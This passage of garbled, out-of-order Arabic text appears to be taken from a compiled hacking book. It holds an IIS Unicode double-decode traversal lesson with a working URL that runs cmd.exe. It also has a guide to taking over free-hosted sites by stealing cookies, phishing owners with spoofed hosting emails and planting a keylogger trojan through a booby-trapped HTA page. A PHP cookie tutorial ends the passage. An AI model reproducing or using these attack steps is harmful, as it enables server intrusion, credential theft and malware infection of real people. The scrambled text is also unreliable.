‬سيظهر لك كلم كثير جداا و لكنى اخترت منه جزء بسيط فقط للتوضيح و انت عليك الباقى‬ ‫شوف ايه الى راح يظهر لك ‪::‬‬ ‫‪Starts a new instance of the Windows 2000 command interpreter‬‬ ‫‪[CMD [/A | /U] [/Q] [/D] [/E:ON | /E:OFF] [/F:ON | /F:OFF] [/V:ON | /V:OFF‬‬ ‫]]‪[S] [/C | /K] string/‬‬ ‫‪C Carries out the command specified by string and then terminates/‬‬ ‫‪K Carries out the command specified by string but remains/‬‬ ‫‪(S Modifies the treatment of string after /C or /K (see below /‬‬ ‫‪Q Turns echo off/‬‬ ‫‪(D Disable execution of AutoRun commands from registry (see below /‬‬ ‫هذا جزء بسيط جداا مما راح يظهر لك و لكن تعالى نشوف هذا الجزء ايه معناه اول يقولك ‪::‬‬ ‫‪ Starts a new instance of the Windows 2000 command interpreter‬و هذه‬ ‫الجمله تعنى بالعربيه بدايه حاله جديده من مترجم ال ويندوز ‪ 2000‬و هذا طبعا وضح لنا ان كل ‪cmd‬‬ ‫يمكن ان يتخكم صاحبه فى حالته حسب ما يفتح او يغلق ال ‪ ..‫بالتحديد هذا الفولدر يسمى الفولدر التنفيذى اى ‪( executable directory‬‬ ‫و طبعا هذا الفولدر ليس له اسم ثابت هذا فقط مثال و لكن يمكن ان يكون له اسماء كثيره على الملقم ‪ iis‬و‬ ‫ملحوظه هامه‪ ::‬ل يوجد على كل ملقم ‪ iis‬هذا الفولدرالتنفيذى اى ‪executable directory‬‬ ‫و اعتقد ان الصديق بلك هنتر و الخ هكس قد ذكرو معظم اسامى هذه الديريكتورز فى شرحهم )فأنا اريد ان‬ ‫اربط الدروس مع بعض حتى تكون سلسله متكامله (‬ ‫* ‪ <=== winnt/system32/cmd. traceroute‬الخ اعتقد انها فكره لم يلحظها بعضنا (‬ ‫* ؟‪ -‬علمه الستفهام تخيلو حتى علمه الستفهام فى هذه الثغره لها دور فهذه العلمه تعنى الحاله التى ينفذ‬ ‫بها المر )طبعا مش فاهم يعنى ايه ( و ل يهمك تعالى معى افهمك يعنى ايه علمه الستفهام تعنى كلمه‬ ‫‪ argument‬و هذه الكلمه هى التى تعنى الحاله التى سينفذ بها المر اى انه امر مثل ينفذ فى لحظه ثم‬ ‫ينتهى مثل ‪ copy‬مثل ام انه امر مثل ينفذ و لكن يستمر مفعوله و حقيقه ان طبعا معظم الوامر التى‬ ‫نستخدمها هى الوامر العاديه و هى من نوع ‪ argument /c‬و هذا ال ‪ c/‬يعنى ان المر ينفذ فى لحظه ثم‬ ‫ينتهى‬ ‫تعالى افهمك اكثر ‪ ::‬لو عندك ويندوز ‪ 2000‬افتح ال ‪ cmd‬بتاعك و اكتب هذا )‪ (?/ cmd‬و اضغط‬ ‫انتر ‪.exe‬و طبعا هذا هو ال ‪ cmd‬الذى يسمح لنا بأدراج سطور‬ ‫الوامر التى نريد تنفيذها )و على فكره ممكن تستعمل هذا ال ‪ cmd‬فى استخدام اوامر مثل ‪ ping‬و‬ ‫‪ netstat‬و ‪.. arguments‬و بعدها يظهر لنا‬ ‫‪ arguments‬كثيره و منها الذى نستعمله دائما فى الثغره و هو ‪ c/‬شوفو كده ما المكتوب امامه ‪::‬‬ ‫‪ Carries out the command specified by string and then terminates‬و هذا‬ ‫الكلم معناه انه ينفذ المر الموجود فى سطر الوامر ثم ينتهى و طبعا هذا للوامر العاديه التى نعرفها‬ ‫تعالو نشوف السطر الى تحتيه ‪::‬سوف نجد انه يتكلم عن ‪ argument‬ل نراه فى ثغره اليونى كود و هو ال‬ ‫‪ k/‬شوفو ايه مكتوب امامه‪::‬‬ ‫‪ Carries out the command specified by string but remains‬و طبعا معناه انه ينفذ‬ ‫الوامر الموجوده فى السطر و لكن يستمر مفعولها )ما زلت ابحث عن اوامر مثل هذه و لكن هذا ما هو‬ ‫مكتوب امامى و لكن تقدر تقول انها الوامر التى تأخذ فتره طويله حبتين مثل ‪ ping‬مثل (‬ ‫و مثل هناك ‪ argument‬أخر مثل ‪ Q/‬و هذا نستخدمه فى اغلق تفعيل امر ‪ echo‬كما هو واضح فى‬ ‫المثال فوق‬ ‫و هناك الكثير من هذه ال ‪ arguments‬و طبعا منها ما هو اساسى ل يمكنك التحكم فيه )يعنى فتحه او‬ ‫غلقه مثل ال ‪ c/‬و ال ‪ ( k/‬و هناك اخرين يمكنك ان تجعلهم ‪ on‬او ‪ off‬و بهذا تكون انت تتحكم بحاله ال‬ ‫‪ cmd‬خاصتك )ياريت تنفذ المر و تقرأ المكتوب لنك راح تلقى تفاصيل الفتح و الغلق بالتفصيل ( و‬ ‫اصبروا على قليل حتى انتهى من المتحان الول فى ‪ MCSE‬فى خلل اسبوعين ان شاء ال تعالى و بعد‬ ‫ذلك نعود اكثر قوه و نشرح لكم هذه النقطه بالتفصيل ان شاء ال بس اصبرو شوى‬ ‫‪141‬‬ ..

%255c.+c/‬و بالتالى كما عرفنا فوق انا ‪ c/‬هى ال ‪ argument‬لل ‪ cmd.‬انت تشغل ال ‪ cmd.‬اذن اعتقد انك ادركت تماما الن انك ترسل ‪hex values‬‬ ‫عوضا عن الحروف و الحركات العاديه الى السرفر و هذا بالضبط ما نسميه التحليل او فك الشفره او ال‬ ‫‪decode‬‬ ‫تعالى نخش فى تفاصيل الثغره اكثر و سنأخذ الحركه التى نشرح عليها هى ال ‪ ( slash) /‬حيث انها من‬ ‫اساسيات الديكود فى هذه الثغره ‪::‬‬ ‫شوف فى جدول ال ‪ hex value‬راح نجد ان ال ‪ ..‬‬ ‫تعالو نروح لنقطه سهله و بسيطه جدااا فى الثغره ‪.‬‬ ‫**و نأتى الن لهم نقطه فى الثغره و هى اساسا سبب الثغره كما ذكرنا فى اول الكلم )هو ان سبب الثغره‬ ‫يكون حل شفره العنوان اكثر من مره (و هذا ما نطلق عليه ال ‪ decode‬و انا شخصيا افصل الديكودز على‬ ‫انه تحليل حتى نصل لبسط الحل كما فى الرياضيات يعنى ‪ simplyfiey‬اى تبسيط و فك المعادله تعالو‬ ‫خلينا نفهمكم هذا على الثغره نفسها ‪::‬‬ ‫‪ %255c.exe+PRINT‬‬ ‫* ‪ ./‬هذا هو الديكود اى التحليل للصل ‪..exe+PRINT‬بل من ‪ cmd..exe‬او الحاله التى سينفذ عليها‬ ‫ال ‪ cmd‬المر اما علمه ال ‪ +‬التى بجانب ال ‪ c/‬فهى بمقام المسافه بين الكلمتين فى الثغره و لكن ل يمكننا‬ ‫اسبدالها بمسافه عاديه و بعدها يكون المر الذى يحمله سطر الوامر لينفده ثم علمه ‪ +‬ثانيه و بعدها اسم‬ ‫الدرايف الذى تعرض محتوياته على الشاشه حاليا ‪.exe?/c‬و بهذا تكون قد شغلت الفايل الذى تريده‬ ‫)‪.%5c.%... 5c% = /‬طبعا هذا هو الديكود الول الذى ستفكر الن‬ ‫فى انك تحذف ال ‪ /‬و تضع بدل منها هذا ال ‪ value‬فتنجح الثغره و لكن انا اقول لك هذا خطأ لن هذا هو‬ ‫الديقود الول و انا ذكرت ان الديكود يحدث مرتين او ممكن اكثر يعنى لو وضعت هذا الديكود الول فستجد ان‬ ‫ال ‪ iis‬لديه القدره على ان يمسك هذا الديكود و يمكنعه من التنفيذ و لذلك علينا ان نحلل هذا ال ‪ value‬حتى‬ ‫يتم الديكود التانى فتنجح الثغره‬ ‫و بالنظر الى جدول ال ‪ hexadecimal values‬شوف نجد هذا ‪::‬‬ ‫‪%25 = %‬‬ ‫‪142‬‬ ..‫اعتقد انك الن فهمت ما هى ال ‪ arguments‬و ما فائده ‪ c/‬التى تكتبها فى الثغره و انا متأكد انك ل تعرف‬ ‫معناها ‪.... ( enjoy this‬حيث تصبح الثغره بهذا الشكل ‪::‬‬ ‫‪http://issserver/scripts/.exe‬لنك تريد ان تتحكم بالموقع و‬ ‫تغير الندكس و الخ و و لكن تعالى مثل نشغل اى ملف تانى ياترى كيف نشغله ؟‬ ‫انا راح اقلك كيف ‪::‬كل ما عليك فعله هو ان تقوم بوضع اسم الفايل الذى تريد تشغيله بهذا الشكل‬ ‫‪ Ping./‬‬ ‫ولكن ما الذى نحاول ان نفعله بهذه التحليلت الغريبه ؟‬ ‫فنحن بذلك نحاول ان نحسن و نلعب فى مسارات الديريكتورز و لكن للسف ل يمكنك تغيير او اللعب فى‬ ‫الديريكتورز لن ال ‪ iis‬مزود بخاصيه عمل ‪ check‬على مثل هذه الديكودز و منعها من التنفيذ و هنا يقع‬ ‫اصل ثغره اليونى كود و هو التحليل لمرتين او لكثر من مره فهمتم قصدى الن اى ان ال ‪ iis‬مزود فعل‬ ‫بخاصيه ال ‪ check‬على هذه الديكودز و لكن انت تضع الثغره و بها اكثر من تحليل واحد لنفس اسم الموقع‬ ‫و لذلك يقوم ال ‪ iis‬بوظيفته المعتاده و هى ال ‪ check‬و المنع على الديكود الول و يظهر له ان كل شئ‬ ‫بخير و انه يسيطر على الموقف خخخخخخخخ و لكن الحقسقه انه يعمل ال ‪ check‬مره واحده فتكون‬ ‫النتيجه ان الديكود الثانى ينجح تماما فى محاوله اللعب فى الديريكتورز و بالتالى يكون نتيجه الديكود الثانى‬ ‫هو ان يرجع الى اصله اى ‪( slash) /‬‬ ‫و تعالو ندخل و نتعمق اكثر فى تفاصيل الديكود للثغره بعد ان عرفنا فكرتها ‪::‬‬ ‫شوفو فيه ماده اسمها ‪ computer logic‬و الماده دى راح درس فيها شئ يسمى ‪HexaDecimal‬‬ ‫‪ Values‬و هذه ال ‪ values‬هى اساس الديكود الذى نفعله فى الثغره اى ان كل حرف صحيح او حركه‬ ‫مثل ‪ /‬فى الكمبيوتر لها ما يسمى بال ‪ hex value‬تعالى اوضحلك اكثر ‪::‬‬ ‫مثل‪ 20% :‬تعنى مسافه )‪(space‬‬ ‫هذا مثال بسيط و اعتقد انك فهمت الن كلمى و طبعا يوجد جدول لهذه ال ‪ hex values‬المساويه‬ ‫للحروف و الحركات العاديه فى الكمبيوتر ‪ ./ping.

..WIN2000 RESOURCE KIT‬‬ ‫انتهى‪،،،‬‬ ‫‪143‬‬ .%.‫‪%35 = 5‬‬ ‫‪c = %63‬‬ ‫و بالتالى نجد انفسنا قد خدعنا ال ‪ iis checker‬بأننا حللنا ال شفره مرتين و بالتالى فسنحصل فى المقابل‬ ‫على الصل و هو ‪ /‬و بالتالى تكون قد نجحت الثغره ‪.‬‬ ‫فهمتم الن شباب معنى ديكود العنوان مرتين و فهمتم اساس الثغره و الديكود مرتين ليس معناه تكرار‬ ‫التحليل الول مرتين و لكن معناه تحليل و فك التحليل الول اى ‪ simplify‬الى ابسط و اطول صوره ممكنه‬ ‫فى نفس الوقت‬ ‫و عشان توضح اكثر معك راح احطلك كيف التركيبه الصح للتحليل ‪::‬‬ ‫‪%255c %25 = % 5 = 5 c = c = %5c‬‬ ‫‪%%35c % = % %35 = 5 c = c = %5c‬‬ ‫‪c = %5c = %63 5 = %35 % = % %%35%63‬‬ ‫‪c = %5c = %63 5 = %35 % = %25 %25%35%63‬‬ ‫ثم ‪/= 5c% :‬‬ ‫ارائيتم التحليل طبعا فى الخر يجب ان يساوى الديكود الصل و هو كما واضح فى مثالنا كل التحليلت تساوى‬ ‫‪ 5c%‬و كما ذكرنا ‪ / = 5c%‬و لكننا حللنا هذا الرمز الى اطول و ابسط تحليل حتى نخدع ال ‪iis‬‬ ‫‪. checker‬‬ ‫و فى النهايه بعد فهمنا للثغره و اساسها هيا تعالو نطبقها مع بعض‬ ‫سوف نضع الثغره فى هذا الشكل ‪::‬‬ ‫‪http://iisserver/scripts/.%5c..xe?/c+dir+c:+/s‬‬ ‫و ستدخلون على الموقع بنجاح و لكن اكيد تلحظون شئ جديد قد زاد على الثغره و هذا الشى هو ‪s/+‬‬ ‫هذا الرمز‬ ‫و عندما تدمج هذا الرمز مع الثغره كما فى المثال السابق سوف تأتيك لسته بكل فايل كبير و صغير فى‬ ‫كمبيوتر الويب سرفر‬ ‫و ال تعبت فى هذا الدرس و تعبت فى قرائه المعلومات و تجميعها عن اليونى كود حتى اصل لهذا الشكل‬ ‫الخوه و ان شاء ال انتظرو موضوعى القادم بعدما اكون انهيت امتحانى الول فى ‪) MCSE‬ادعولى‬ ‫بالنجاح ( و سيكون عباره عن تلخيص للتعامل مع شبكات ويندوز ‪ 2000‬و كيفيه اختراقها و فائده ال‬ ‫‪..

‬‬ ‫انتهى‪،،،‬‬ ‫‪144‬‬ ..‬‬ ‫‪ *2‬قم بالنقر على إضافة إزالة برامج‪.0.0.‫" تدريب على عملية الختراق بواسطة اليونيكود "‬ ‫>ةةةةةة‪ :‬ةةةة ةةة <‬ ‫بسم ال الرحمن الرحيم‪.”IIS‬‬ ‫هذا بالنسبة لكيفية تنزيل السيرفر‪...‬‬ ‫سيكون التطبيق على جهازك وهو مثل الموقع أو السيرفر وتقوم بتطبيق الدرس كما وأنك على موقع‬ ‫مصاب‪.‬‬ ‫لكي تتدرب على إختراق المواقع قم بتركيب نظام ويندوز ‪ 2000‬على جهازك ‪ .0....‬‬ ‫اما عن كيفية التدرب على الجهاز أي اختراقه فقم بالتالي‪:‬ـ‬ ‫قم بوضع الموقع في مجلد ‪wwwroot‬الموجود داخل مجلد ‪ Inetpub‬طبعا هتدخل عليه بعد ما تشغل‬ ‫السيرفر ‪ IIS‬عن طريق‬ ‫‪/http://127..‬وفي نفس السيدي تبع النظام‬ ‫تقوم بإضافة سيرفر ‪ IIS‬وذلك عن طريق ‪:‬‬ ‫‪ *1‬قم بالذهاب إلى لوحة التحكم‪.‬‬ ‫كثر الكلم عن إختراق المواقع بأنواعه واليوم عندي شرح عن الختراق عن طريق اليونيكود أو بالصح‬ ‫تطبيق عملي على كيفية الختراق عن طريق اليونيكود وهذا النوع يعتبر للمبتدئين وهو الذي بإذن ال‬ ‫سيوصلهم إلى طريق الحتراف ‪.1‬‬ ‫وقم بتطبيق المهارات التي تعلمتها في اختراق المواقع المصابة باليونيكود‪.‬‬ ‫‪ *3‬قم بالنقر على زر " إضافة إزالة مكونات ويندوز "‪.01‬‬ ‫وليجاد الثغرة في الجهاز والتدرب عليها قم بتشغيل برنامج عمران سكان أو أي برنامج اخر للفحص عن‬ ‫الثغرات تبع اليونيكود وقم بوضع العنوان تبعك الي هو ‪/http://127..‬‬ ‫******************‬ ‫بسم ال نبدأ‪....‬‬ ‫‪ *4‬قم بوضع علمة صح على الخيار الول “‪..

...‬ان اختراقها اسهل مماتتصور‬ ‫الساسيات لختراق كل شي هو الكوكيز لنه يحتوي على جميع المعلومات))الموقع‪..‫" شرح مفصل لكيفية اختراق المواقع المجانية "‬ ‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫>ةةةةةة‪:‬‬ ‫‪<De\/iL Ni9hT‬‬ ‫=سهوله اختراق المواقع المجانيه=‪-‬‬‫نعم‪..‬ايميل‪.‬الخ((‬ ‫ولكن يجب ان تعرف عده نقاط مهمه لختراق اي موقع مجاني‬ ‫اول=‪-‬‬ ‫يجب عليك معرفه نوعيه اصدار المتصفح‬ ‫ثانيا=‪-‬‬ ‫عليك معرفه بعض بيانات صاحب الموقع مثل اليميل‪.‬الخ وتستطيع التوصل له ببعض الطرق=‪-‬‬ ‫ثالثا=‪-‬‬ ‫عليك اول ايجاد الكواد الزمه لسرقه الكوكيز من المتصفح=‪-‬‬ ‫لنــبدأ الشرح‬ ‫النقطه الولى لمعرفه نوعيه اصدار المتصفح لصاحب الموقع سهله جدا فكل موقع يصمم على حسب نوعيه‬ ‫المتصفح الخاص بصاحبه ويكت لنا في نهايه الموقع يفضل تصفحه بدقه معينه ويعطيك اصدار الكسبلور‬ ‫المناسب لتصفح الموقع=المناسب لتصميمه=نفس الصدار الخاص بهوهذه اسهل نقطه واهم شئ فيها‬ ‫لختراق المواقع المجانيه‬ ‫واما بالنسبه للوصول الى الضحيه فهناك عده طرق ويجب ان يكون معاك اكواد الهتمل الخاصه بسرقه‬ ‫الكوكيز))ساضعها هنا لحقا((والن بعدما حصلت على هذه الكواد تضعها في صفحه وتحاول جذب الضحيه‬ ‫للتوجه لها وهناك عده طرق‬ ‫‪-1‬تاخذ عنوان ماسنجر او ايميله من اي مكان في الموقع اذا وضعه وتحبه وتصير موثوق‬ ‫عنده))هههههههه حب مصلحه((وتعطيه صفحتك الى حطيت فيها الكوكيز او ترسل له ملف سارق الباسوورد‬ ‫‪145‬‬ .

‬‬ ‫اول قم بتحميل برنامج ‪keykey2000‬وهذا البرنامج يسجل كل شي بالكيبورد والشياء الى كنت تعمل بها‬ ‫ويرسلها على اليميل وانا مجربه وليستطيع النورتون الجديد والزرار الثلثه للغاء العمليات النشطه في‬ ‫النظام ايقافه ووصلته‬ ‫‪http://www..5‬هذه هي‬ ‫سر المهنه((ووصلته‬ ‫‪http://www..s5‬الخ‬ ‫وتسجل عندهم وسيرسلون لك البيانات ويكون لهم تصميم خاص جدا وانت عليك بسرقه نفس التصميم‬ ‫وتغيير محتوى الرساله))طبعا بالعنقليزي((وارسال رساله منه تتطلب منه فتح موقع))موقعك الى فيه‬ ‫الكود((مثل لعمل التحديثات اواي شئ اخروهو لن يشك اذا رأى تصميم رسالتك وطريقتك نفس طريقه موقع‬ ‫الشركه وسيفتح الموقع حال‬ ‫واذا لم يضع ايميله فهناك طريقه وهى انك مثل تدخل سجل الزوار عندهوتكتب شي يقهره و يجذبه بقوه يعني‬ ‫مثل تقول له تصميم موقعك مسروق حرفيا من هذا الموقع وتعطيه اللنك))وهو للمره المليون اقلكم الموقع‬ ‫الى فيه الكود((او اي طريقه اخرى من ذكائكواذا لم تجد ايميله او سجل زوار فهناك عليك اختراق الموقع‬ ‫بالثغرات وهو صعب جدا جدا‬ ‫النقطه الثالثه وهي الكوكيز=‪-‬‬ ‫يطول شرحها عشان كدا بحط شرحه في موضوع تاني مرفق معاه الكواد الخاصه بالمتصفحات مع طريقه‬ ‫التعامل معها لسرقه كوكيز الضحيه وتوصيله الى جهازك‬ ‫طريقه اختراق المواقع المجانيه التى اصحابها لديهم متصفح ‪IE 5 IE 5...name.com‬‬ ‫فهذا معناه ان الموقع مقدم من شركه فري سيرفر ‪FreeServerS‬وتستطيع معرفه النطاق المحدده‬ ‫بالدخول الى المواقع المجانيه وعمل تسجيل وستظهر لك انواع الدوامين المتاحه))‪.8m.zip‬‬ ‫‪146‬‬ ..thecorpz.8m.org/activex/gwpackage.5‬‬ ‫هذه هي الطريقه التى تستعملها اذا استطعت الوصول الى صاحب الموقع ))راجع درس "سهوله اختراق‬ ‫المواقع المجانيه"((‬ ‫اول لن نعتمد على الكوكيز في سرقه الباسوورد وسنعتمد على تروجان قوي وخطير يسجل كل شي في‬ ‫الكيبوردوليكشفه النورتون انتي فايروس وهو الذي سنضعه في صفحه ملغومه اول مايفتحها الضحيه ينزل‬ ‫الى جهازه‪.com/kk2000pro.mikkotech.exe‬‬ ‫والسيريال نمبر‬ ‫‪SN: K100-43-109-0-793218E876A4C9-29‬‬ ‫والبرنامج سهل جدا ول يحتاج لشرح واذا اردتم شرحه كلمونيوالن بعدما جهزت ملف الباتش بهذا البرنامج‬ ‫قم بتحميل برنامج ‪godwill‬وهو البرنامج الخاص للغام الموقع على انترنت اكسبلور ‪ 5‬و ‪))5..‫‪-2‬مثل تحدد نوعيه الشركه الى مقدمه الستضافه المجانيه للموقع فمثل اذا كان عنوان الموقع‬ ‫‪/http://www.

‬‬ ‫‪147‬‬ .‬الخ((وهذه الطريقه تنفع ايضا لسرقه الشتراكات‬ ‫واساميه في المنتديات وايميله‪.thecorpz.html‬‬ ‫===================نهايه الشـــرح====================‬ ‫وبعدما تقوم بوضع الصفحه الملغومه في النت واعطائها للضحيه بالطرق التى شرحتها سابقا سينزل‬ ‫التروجان على جهازهعندما يقوم بفتح موقعك الملغوم ولم يبقى لك الن انت تنتظر في بريدك الى حطيته في‬ ‫التروجان المعلومات عن الضحيه مثل))الموقع واليميل‪.‫====================الشــــرح=====================‬ ‫انا لن اقوم بعمل شرح بالصور وهذا شرح بسيط للبرنامج لنه سهل جدا‬ ‫عندما تفتح البرنامج ستظهر لك لوحه اختار منها‬ ‫‪enter‬في السفل وستظهر لك القائمه والذى يهمنا منها‬ ‫‪Upx‬وهذا لتشفير الباتش))اظننا خرجنا عن موضوعنا((‬ ‫‪Html‬وكل شغلنا هنا لكي نقوم بعمل صفحه ملغومه وعندما نضغط عليه تجي عده اختيارات وانت اختار‬ ‫منها‬ ‫‪General options‬وستظهر لك مربع عرض الصفحات الملغومه وهذا شرح سريع لها‬ ‫‪enter exe file‬ومن هنا تضع الباتش الى سويته بشرط ال يكون حجمه كبير جدا))هل تفيدنا هذه‬ ‫المعلومه في شئ((‬ ‫‪enter html‬لستعراض صفحه من جهازك ثم الغامها وحط علمه صح جانب ‪use default‬‬ ‫‪page‬ليقوم البرنامج بعمل صفحه جديده‬ ‫وفي السفل ‪HTA File Name‬وهنا تضع اسم الصفحه وبعد النتهاء من ذلك نختار كلمه ‪Done‬ليقوم‬ ‫البرنامج بعمل الصفحه))وسيكون مكانها في نفس مجلد البرنامج((‬ ‫وارجو ان يكون الشرح واضحا‬ ‫واذا واجهت مشكله مع البرنامج توجه الى هذا الموقع‬ ‫‪http://www.org/html/activesploits..

‬‬ ‫‪ -2‬زراعة الكعكات على جهاز العميل ‪.‬‬ ‫وتختلف المعلومات التي تخزن ضمن ملفات الكوكيز من موقع لخر ‪ ،‬ولكن ليس بإمكان هذه المواقع‬ ‫استرجاع أي معلومات إضافية عنك أو عن جهازك ‪ ،‬باستثناء تلك المعلومات المخزنة في الملف النصي‬ ‫الخاص بها ‪ ،‬والتي تم إرسالها من قبل الموقع ‪ ،‬وبذلك ل تستطيع هذه المواقع الطلع على مضمون ملفات‬ ‫الكوكيز الخرى ‪ ،‬أو أي ملفات خاصة على جهازك ‪..‬وفي‬ ‫الوقت ذاته يبحث المتصفح عن ملفات كوكيز ‪ ،‬التي تخص الموقع المطلوب ‪ ،‬فإذا وجدها يتم إرسالها مع‬ ‫طلب مشاهدة الموقع ‪ ،‬وإذا لم توجد ‪ ،‬فإن الموقع سيدرك أن هذه زيارتك الولى إليه ‪ ،‬فيقوم بإرسال ملفات‬ ‫الكوكيز إلى جهازك لتخزن عليه ‪.‬‬ ‫ كيف يتم إيداع ملفات الكوكيز على جهازك ؟‬‫يرسل المتصفح ‪ ،‬عند إدخالك عنوان موقع في شريط العناوين ‪ ،‬طلبًا إلى الموقع الذي حددته ‪ ،‬متضمنًا‬ ‫عنوان ‪ IP‬الخاص به ‪ ،‬ونوع المتصفح الذي تستخدمه ‪ ،‬ونظام التشغيل الذي يدير جهازك ‪ ..‬‬ ‫معلومات عامة‬ ‫ ما هي ملفات الكوكيز ؟‬‫ملفات الكوكيز عبارة عن ملفات نصية ‪ ،‬تقوم المواقع التي تزورها بإيداعها على القرص الصلب في‬ ‫جهازك ‪ ،‬وتحتوي هذه الملفات النصية على معلومات تتيح للموقع الذي أودعها أن يسترجعها عند الحاجة ‪،‬‬ ‫أي عند زيارتك المقبلة للموقع ‪.‬‬ ‫‪ -4‬تطبيق ‪ :‬تخصيص لون الخلفية ‪.‬‬ ‫وبإمكان الموقع تغيير المعلومات الموجودة ضمن ملفات الكوكيز أو إضافة معلومات جديدة كلما قمت بزيارة‬ ‫الموقع ‪ .‬‬ ‫اقسام الدرس ‪:‬‬ ‫‪ -1‬معلومات عامة ‪.‬‬ ‫في هذا الدرس سنتعرف على الكعكات و كيف يمكننا استخدامها ‪.‬‬ ‫‪ -3‬قراءة الكعكات من جهاز العميل ‪.‬يتم تخزين بعض ملفات الكوكيز في الذاكرة فقط ‪ ،‬بحيث يجري حذفها مباشرة عند إغلقك‬ ‫المتصفح ‪ ،‬ولكن معظمها وتسمى "ملفات الكوكيز المثابرة"‪ ،‬يتم تخزينها لفترة محددة على القرص الصلب‬ ‫لحين انتهاء صلحيتها وقد تدوم صلحيتها مدة أشهر أو حتى سنوات ‪ .‬تخّزن هذه‬ ‫المعلومات في ملفات خاصة بالمزود ‪ ، Log Files‬ول علقة للكوكيز بالمعلومات التي يتم إرسالها ‪ .‫انتهى‪،،،‬‬ ‫" درس مفصل عن الكوكيز "‬ ‫>ةةةةة ةة ةةةةةةة ةةةةة ةةةةةة<‬ ‫>ةةةةةة‪:‬‬ ‫‪<Linux Girl‬‬ ‫مقدمة‬ ‫تعد الكعكات ) الـ ‪ ( cookies‬من الوسائل المفيدة في انشاء مواقع اكثر تفاعلية ‪ ،‬فبواسطتها ستتمكن من‬ ‫معرفة هل قام المتصفح بزيارة موقعك من قبل ام ل ‪.‬أما بعض ملفات الكوكيز التي تعرض‬ ‫‪148‬‬ ..

int secure .(setcookie('site'...‬؟ كيف ؟ ‪ :‬استخدم الدالة ‪ serialize‬لتحويل اي متغير في بي اتش‬ ‫بي الى شكل نصي و من ثم استخدم ‪ unserialize‬لعادته الى الشكل الطبيعي ‪.‬‬ ‫‪ : value‬القيمة ‪ .‬‬‫مثال ‪:‬‬ ‫‪:code‬‬ ‫>?‬ ‫‪. string value [..‬لكن انتبه بامكانك‬ ‫وضع مصفوفة لكن بطريقة اخرى ‪ ..‬‬ ‫‪ <-‬ثانيًا ‪ :‬أن يكون الوقت المعطى كمدخل اقل من الوقت على جهاز العميل و عندها ل يقوم المتصفح على‬‫جهاز العميل بتخزينها و اذا وجدت كعكة بنفس السم فانه يحذفها حتى لو لم تنتهي المدة ‪.palhackerz.‬ل يمكنك وضع مصفوفة كقيمة و هذا أامر مهم ‪ ....‬فقط قيم نصية ‪ ..‬فبامكانك ارسال اكثر من كعكة الى متصفح واحد و عندها يصبح السم هو‬ ‫الطريقة الوحيدة للتمييز ‪.‬‬ ‫زراعة الكعكات على جهاز العميل‬ ‫أول ‪ :‬كيف تزرع ملفات الكعكات ‪:‬‬ ‫يتم ذلك باستخدام الدالة ‪ setcookie‬و تعريفها بالشكل التالي ‪:‬‬ ‫‪:code‬‬ ‫‪boolean setcookie ( string name [. string domain [.com/'.‬‬ ‫تهمنا المدخلت الثلث الولى و هي ‪:‬‬ ‫‪ : name‬اي اسم الكعكة ‪ .‬و هنا ثلث حالت ‪:‬‬ ‫‪ <-‬أوًل ‪ :‬أن يكون الوقت المعطى كمدخل اكثر من الوقت الحالي على جهاز العميل و عندها تخزن الكعكة‬‫على جهاز العميل و تحذف عند انقضاء المدة ‪.‬‬ ‫‪ <-‬ثالثًا ‪ :‬إذا لم تحدد وقتا فان الكعكة تخزن في ذاكرة المتصفح و تفقد حالما يغلق المستخدم الموقع ‪.. int expire‬‬ ‫]‪([[[[[string path [.‬‬ ‫‪ : expire‬اي عدد الثواني من بدية عصر اليونكس ) ‪ 1‬يناير ‪ ( 1970‬و التي بعدها سيقوم المتصفح على‬ ‫جهاز المستخدم بحذف الكعكة ‪ .time()+3600‬‬ ‫?<‬ ‫من الدوال المفيدة دالة ‪ time‬و التي ترجع الوقت الحالي على شكل عدد الثواني من بداية عصر اليونكس )‬ ‫‪149‬‬ ..'http://www..‬‬ ‫ مكونات ملف الكوكيز ‪:‬‬‫يتكون عادة من عدة اجزاء هي اسم الملف ‪ ،‬قيمته ‪ ،‬تاريخ انتهاء مفعوله ‪ ،‬الموقع المالك له ‪..‬وتعود المعلومات المخزنة‬ ‫في ملفات الكوكيز إلى مزودات الموقع الذي أصدرها فقط ‪ ،‬وقد تعمم بعض الشركات الكبرى ملفات الكوكيز‬ ‫التي تصدرها على جميع مزوداتها ‪ ،‬لتنسيق المعلومات المتضمنة ‪ ،‬ولكي ل تصدر كل من مزوداتها ملفات‬ ‫كوكيز للمستخدم ذاته ‪ ،‬عند زيارته لصفحات مختلفة في الموقع ‪..‫تاريخ صلحية لتاريخ سابق ‪ ،‬فإنها ُتحذف مباشرة ول ُتخّزن على قرصك الصلب ‪ ..

(1970‬‬ ‫ثانيا كيف تحذف او تعدل كعكة‪:‬‬ ‫لكي تحذف كعكة عليك أن ترسل كعكة بنفس السم و خالية القيمة و ذات وقت اقل من الوقت على جهاز‬ ‫المستخدم‬ ‫مثال ‪:‬‬ ‫‪:code‬‬ ‫>?‬ ‫‪.(setcookie('site'.time()-360000‬‬ ‫?<‬ ‫ملحظات ‪:‬‬ ‫‪ -1‬عندما تحدد زمنا ماضيًا اجعله قيمة كبيرة لكي تتفادى فارق التوقيت بين الخادم و العميل ‪.com'.'palhackerz.. setcookie‬‬ ‫المثال السابق كان من الممكن ان يكون ‪:‬‬ ‫‪:code‬‬ ‫>? ‪.‬‬ ‫‪ -2‬لكي تعدل أي كعكة عليك حذفها و إرسالها من جديد ‪.(setcookie('site'.''.com : the best islamic forum‬‬ ‫?<‬ ‫>‪<body/‬‬ ‫>‪<html/‬‬ ‫بل لو كان هنالك مجرد سطر فارغ قبل علمة البداية ?< فلن تعمل الدالة ‪.time()+20000‬‬ ‫‪."echo " Alfjr.com'..‬فمثل الكود التالي لن ينجح ‪:‬‬ ‫‪:code‬‬ ‫>‪<html‬‬ ‫>‪<body‬‬ ‫>?‬ ‫‪.'palhackerz.‫‪ 1‬يناير ‪.(setcookie('site'.‬‬ ‫ملحظة مهمة ‪:‬‬ ‫يجب ان تستدعي الدالة ‪ setcookie‬قبل أن ترسل اي شيء الى المتصفح ‪ .time()+20000‬‬ ‫?<‬ ‫>‪<html‬‬ ‫‪150‬‬ ..

